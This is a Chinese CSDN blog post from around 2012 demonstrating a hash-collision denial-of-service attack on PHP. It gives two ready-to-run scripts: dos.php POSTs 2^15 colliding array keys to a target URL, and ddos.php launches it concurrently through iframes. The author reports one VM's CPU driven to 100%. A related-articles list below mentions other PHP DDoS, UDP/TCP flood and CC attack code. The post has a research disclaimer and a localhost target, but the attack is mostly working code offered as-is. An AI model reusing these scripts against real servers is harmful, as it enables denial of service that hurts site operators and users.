通过PHP的hash冲突漏洞进行DDoS攻击

最新推荐文章于 2022-09-13 22:37:59 发布
最新推荐文章于 2022-09-13 22:37:59 发布
阅读量1.1w 收藏 8
点赞数 2
分类专栏: PHP 文章标签: php output 服务器 xhtml url iframe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linvo/article/details/7169718
版权

声明:本文内容只用于研究学习使用,请勿用于非法行为!

上回咱说到了最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。

不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.php

// 目标地址
// 只要目标地址存在,不用管它是干嘛的
$host = 'http://127.0.0.1/test.php'; 

$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
    $data .= '&array[' . $key . ']=0';
}

$ret = curl($host, ltrim($data,'&'));
var_dump($ret);


function curl($url, $post, $timeout = 30){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));  
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    $output = curl_exec($ch);
    if ($output === false) return false;
    $info = curl_getinfo($ch);
    $http_code = $info['http_code'];
    if ($http_code == 404) return false;
    curl_close($ch);
    return $output;
}

文件:ddos.php 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>DDOS</title>
</head>

<body>
<?php
for($i=0; $i<5; $i++){//并发数
    echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';
}
?>
</body>
</html>

虽然我的测试目标服务器是台虚拟机,但仅用了2个并发就使目标机CPU飙到了100%。但是100%的CPU占用并不代表着就已经拒绝服务,点到为止:)

----------------------------------------------- 华丽丽的分割线 ----------------------------------------------------------

就在写这篇的时候,时间已步入2012,祝大家新年快乐,笑口常开:D

Linvo
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
如何解决hash冲突
01-21
1)冲突是如何产生的?  上文中谈到,哈希函数是指如何对关键字进行编址的规则,这里的关键字的范围很广,可视为无限集,如何保证无限集的原数据在编址的时候不会出现重复呢?规则本身无法实现这个目的。举一个例子...
php对文件进行hash运算的方法
10-24
主要介绍了php对文件进行hash运算的方法,涉及针对文件的hash运算技巧,非常具有实用价值,需要的朋友可以参考下
什么是哈希冲突?哈希冲突怎么解决?
weixin_50777322的博客
09-13 1158
什么是哈希冲突?哈希冲突怎么解决?
基于$_session变量的验证码用于ddos攻击的防御(php实现)
weixin_46447549的博客
08-15 429
文章目录一、基础知识1.strpos() 函数2.strpos() 函数3.PHP Session4.fopen() 函数二、使用步骤1.引入库2.读入数据总结 一、基础知识 1.strpos() 函数 ①用法: strpos() 函数查找字符串在另一字符串中第一次出现的位置,对大小写敏感,且是二进制安全的。 ②参数: strpos(string,find,start) string 必需。规定要搜索的字符串。 find 必需。规定要查找的字符串。 start 可选。规定在何处开始搜索。 ③
php hash碰撞攻击与防御
赵阳的博客
12-01 1299
一、前言 hash碰撞攻击就是构造恶意的数据是hash表退化为链表,每次插入数据都会遍历链表,消耗大量服务器资源,从而达到攻击目的。php的数组就是利用hash表实现的,对于碰撞的数据,php采用双向链表解决方案,所以可以利用PHP的数组进行hash碰撞攻击。 二、模拟攻击 很多接口都采用json数据格式来传输,通常php都会使用php:input获得数据流,然后使用json_decode解析js...
Hash-lookup.zip_hash冲突
09-20
在“Hash-lookup.zip_hash冲突”这个主题中,我们主要探讨的是在使用哈希表进行查找时遇到的冲突问题以及解决策略。 哈希函数是哈希查找的核心,它的作用是将任意长度的关键字映射到固定大小的哈希表(也称为散列表...
geohash:一个解决计算附近距离的php类库
04-29
PHP中,`geohash`库可以方便地进行以下操作: 1. **编码**:将经纬度坐标转换为`geohash`字符串。这个过程可以将连续的空间区域映射到可排序的字符串,便于存储和检索。 2. **解码**:将`geohash`字符串转换回...
PHP核心技术与最佳实践之Hash冲突
veaglefly的博客
04-14 1071
PHP核心技术与最佳实践之Hash冲突 接着上一篇文章,测试后输出value1value2.当 $ht->insert(‘key12’,’value12’); Echo $ht ->find(‘key12’);时, 发现输出value12value12.这是什么原因呢? 这个问题称为Hash表的冲突。由于insert的是字符串,采用的算法是将字符串的ASIIC码相加,按照此方法,冲突
Hash算法解决冲突的方法一般有以下几种常用的解决方法
热门推荐
seulzz的博客
08-14 1万+
Hash算法解决冲突的方法一般有以下几种常用的解决方法  1, 开放定址法:  所谓的开放定址法就是一旦发生了冲突,就去寻找下一个空的散列地址,只要散列表足够大,空的散列地址总能找到,并将记录存入  公式为:fi(key) = (f(key)+di) MOD m (di=1,2,3,……,m-1)  ※ 用开放定址法解决冲突的做法是:当冲突发生时,使用某种探测技术在散列表中形成一个探测序列
防止phpddos攻击
炉火纯青
10-12 4295
先来理解一下什么是phpddos流量攻击,phpddos是一种黑客经过入侵WEB效劳器植入phpshell从而控制这个phpshell 向其他受害者或本人的效劳器发送UDP攻击包停止DDOS攻击,这类攻击有一个最大的特性,就是上传流量霎时增大,通常流量高达数十以至近百M,将整台效 劳器,以至将整台机柜的宽带堵住,使网站无法运转,而这样的攻击,我们无法从远程处理,一但那个phpshell运转,你的宽
DOS攻击原理
没有用户名的博客
03-27 583
标准的TCP三次握手过程如下: 1、客户端发送一个包含SYN标志的TCP报文,SYN即同步(Synchronize),同步报文会指明客户端使用的端口以及TCP连接的初始序号; 2、服务器在收到客户端的SYN报文后,将返回一个SYN+ACK(即确认Acknowledgement)的报文,表示客户端的请求被接受,同时TCP初始序号自动加1; 3、客户端也返回一个确认报文ACK给服务器端,同样TC
php+ddos原理,PHP DDos的几个防御方法详解_PHP教程
weixin_32316643的博客
03-17 709
PHP DDos是一种利用服务器就是利用我服务器php.ini中配置allow_url_fopen = On才得成了,但allow_url_fopen 这个功能很多网站都需要使用,下面我来给大家介绍一些关于PHP DDos的几个防御方法我们先来看php ddos代码代码如下复制代码$packets = 0;$ip = $_GET['ip'];$rand = $_GET['port'];set_t...
解决hash冲突的方法
前端产品工程师
07-23 978
虽然我们不希望发生冲突,但实际上发生冲突的可能性仍是存在的。当关键字值域远大于哈希表的长度,而且事先并不知道关键字的具体取值时。冲突就难免会发 生。另外,当关键字的实际取值大于哈希表的长度时,而且表中已装满了记录,如果插入一个新记录,不仅发生冲突,而且还会发生溢出。因此,处理冲突和溢出是 哈希技术中的两个重要问题。 1、开放定址法      用开放定址法解决冲突的做法是:当冲突发生时,使用
结合Socket实现DDoS攻击
weixin_33840661的博客
03-03 2605
一、实验说明 1. 实验介绍 通过上一节实验的SYN泛洪攻击结合Socket实现DDoS攻击。 2. 开发环境 Ubuntu Linux Python 3.x版本 3. 知识点 本次实验将涉及以下知识点: argparse 命令解析 socket的基本用法 4. 效果图 二、理论知识 1. 实现思路 由于上节实验我们已经实现了SYN泛洪攻击,而DDoS则是多台主机一起发起攻击,我们只需...
PHP DDOS的UDP攻击,TCP攻击,和CC攻击的核心代码
weixin_34345560的博客
09-17 890
网络安全向,请勿用作非法用途 CC攻击模块: &lt;?phpecho “状态 : 正常运行中…..&lt;br&gt;”;echo “================================================&lt;br&gt;”;echo ”  &lt;font color=blue&gt;www.phpddos.com&lt;br&gt;”;echo ”  CC Fl...
Hash碰撞与拒绝服务攻击
wangweilica6的专栏
09-15 586
1.HashHash碰撞 Hash,简单来讲,是一种将任意长度的输入变换成固定长度的输出。Hash函数通常被翻译成散列函数。Hash通常用来校验信息的一致性。Hash函数的实现多种多样,在安全领域应用最为广泛的是SHA-x系列和MDx系列。Hash函数也划分为带密钥的Hash函数和不带密钥的Hash函数,通常所说的Hash函数是不带密钥的Hash函数。 如果找到碰撞,那么意味着我们
PHP拦截网站DDOS攻击防御代码
chonglicuan1036的博客
07-05 659
<?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fileht))file_put_contents($fileht,""); $filehtarr=...
ThreadLocal hash冲突
最新发布
05-28
当多个线程使用同一个ThreadLocal对象时,可能会出现hash冲突的情况。这种情况下,不同的线程会被分配到相同的桶中,从而导致变量副本的混乱。 为了避免ThreadLocal hash冲突,可以采用以下两种方式: 1. 使用多个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值